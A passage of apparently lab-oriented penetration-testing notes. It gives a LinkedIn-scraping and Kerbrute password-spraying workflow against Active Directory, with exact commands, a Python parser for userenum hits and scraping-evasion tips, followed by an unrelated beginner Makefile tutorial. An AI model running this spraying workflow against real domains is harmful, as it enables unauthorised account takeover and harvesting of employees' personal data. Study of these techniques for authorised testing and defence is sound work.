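        for fmt, user in username_variants(name).items():
            bucket = lists.setdefault(fmt, [])
            if user not in bucket:
                bucket.append(user)
    return lists


if __name__ == "__main__":
    print(build_lists(["John Smith", "Jane Doe", "John Smith"])["flast"])  # ['jsmith', 'jdoe']
```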

Workflow for Password Spraying

- Scrape LinkedIn for company employees

- Use generated username lists as input for Kerbrute to validate which users exist in the domain

- Spray validated users with common passwords

python3 linkedin2username.py -u user@email.com -c 1234

kerbrute userenum -d domain.local --dc 172.16.5.5 flast.txt

kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'
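The spray step reads valid_users.txt, which has to be built from the userenum hits. Below is a Python sketch that turns a saved copy of the userenum output into that file. It assumes each hit contains VALID USERNAME: followed by user@domain, and it strips ANSI colour codes first. Adjust the regex if your kerbrute version prints differently. The log and output file names are placeholders.

```python
import re

# Assumed shape of a kerbrute userenum hit, e.g.:
#   2024/01/01 12:00:00 >  [+] VALID USERNAME:    jsmith@domain.local
VALID_RE = re.compile(r"VALID USERNAME:\s*([^@\s]+)@\S+")
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")  # terminal colour codes, if captured


def valid_users(output: str) -> list[str]:
    """Extract unique usernames (without @domain) from userenum output, in order."""
    clean = ANSI_RE.sub("", output)
    return list(dict.fromkeys(m.group(1) for m in VALID_RE.finditer(clean)))


def write_valid_users(log_path: str, out_path: str = "valid_users.txt") -> int:
    """Read a saved userenum log and write one username per line; returns the count."""
    with open(log_path, encoding="utf-8", errors="replace") as log:
        users = valid_users(log.read())
    with open(out_path, "w", encoding="utf-8") as out:
        out.write("".join(f"{user}\n" for user in users))
    return len(users)
```

For example, write_valid_users("userenum.log") writes valid_users.txt next to the log, ready for the passwordspray command.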

Tips

- LinkedIn may rate-limit or flag automated scraping; use delays (-d)
- A LinkedIn premium account may return more results

- Combine output with common username wordlists for better coverage

- Always validate generated usernames with Kerbrute before spraying

Make Files

Why do Make files exist?

Make files are used for automation, typically as a step in the software development lifecycle (compilation, builds, etc.). However, they can drive any other task that can be automated from the shell.

Recipe (command) lines in a Makefile must be indented with a tab character, not spaces.

Makefile Syntax

Makefiles consist of a set of rules. Rules typically look like this:

targets: prerequisites
	command
	command
	command

- The targets are file names, separated by spaces. Typically, there is only one per rule.

- The commands are a series of steps typically used to make the targets.

- The prerequisites are also file names, separated by spaces. These files need to exist before the commands for the target are run. They are also called the target's dependencies.

Example

Let’s start with a hello world example:

hello:
	echo "Hello, World"
	echo "This line will print if the file hello does not exist."

There’s already a lot to take in here. Let’s break it down:

- We have one target called hello

- This target has two commands

- This target has no prerequisites

We’ll then run make hello. As long as the hello file does not exist, the commands will run. If hello does exist, no commands will run. It’s important to realize that I’m talking about hello as both a target and a file. That’s because the two are directly tied together. Typically, when a target is run (aka when the commands of a target are run), the commands will create a file with the same name as the target. In this case, the hello target does not create the hello file.

Let’s create a more typical Makefile - one that compiles a single C file. But before we do, make a file called blah.c that has the following contents:

// blah.c

int main() { return 0; }

Then create the Makefile (called Makefile, as always):

blah:
	cc blah.c -o blah

This time, try simply running make. Since there’s no target supplied as an argument to the make command, the first target is run. In this case, there’s only one target (blah). The first time you run this, blah will be created. The second time, you’ll see make: ‘blah’ is up to date. That’s because the blah file already exists. But there’s a problem: if we modify blah.c and then run make, nothing gets recompiled.
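Make's up-to-date check can be approximated in a few lines of Python. This is a simplified sketch of the rule described in this section, not how GNU make is implemented. It ignores recursive rebuilding of prerequisites and assumes every prerequisite already exists. With no prerequisites, an existing target always counts as up to date, which is why editing blah.c triggers nothing here.

```python
import os
import tempfile


def needs_rebuild(target: str, prerequisites: list[str]) -> bool:
    """Simplified make rule: run the recipe if the target is missing or older than a prerequisite."""
    if not os.path.exists(target):
        return True
    target_mtime = os.path.getmtime(target)
    # Assumes every prerequisite exists; real make would try to build it or stop with an error.
    return any(os.path.getmtime(p) > target_mtime for p in prerequisites)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        src, target = os.path.join(d, "blah.c"), os.path.join(d, "blah")
        open(src, "w").close()
        print(needs_rebuild(target, [src]))   # True: blah does not exist yet
        open(target, "w").close()
        os.utime(src, (1000, 1000))           # pretend blah.c is older than blah
        os.utime(target, (2000, 2000))
        print(needs_rebuild(target, []))      # False: no prerequisites, target exists
        print(needs_rebuild(target, [src]))   # False: blah is newer than blah.c
        os.utime(src, (3000, 3000))           # "edit" blah.c
        print(needs_rebuild(target, [src]))   # True: blah.c is now newer
```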

We solve this by adding a prerequisite:

blah: blah.c
	cc blah.c -o blah

When we run make again, the following set of steps happens:

- The first target is selected, because the first target is the default target

- This has a prerequisite of blah.c

- Make decides if it should run the blah target. It will only run if blah doesn’t exist, or blah.c is newer than blah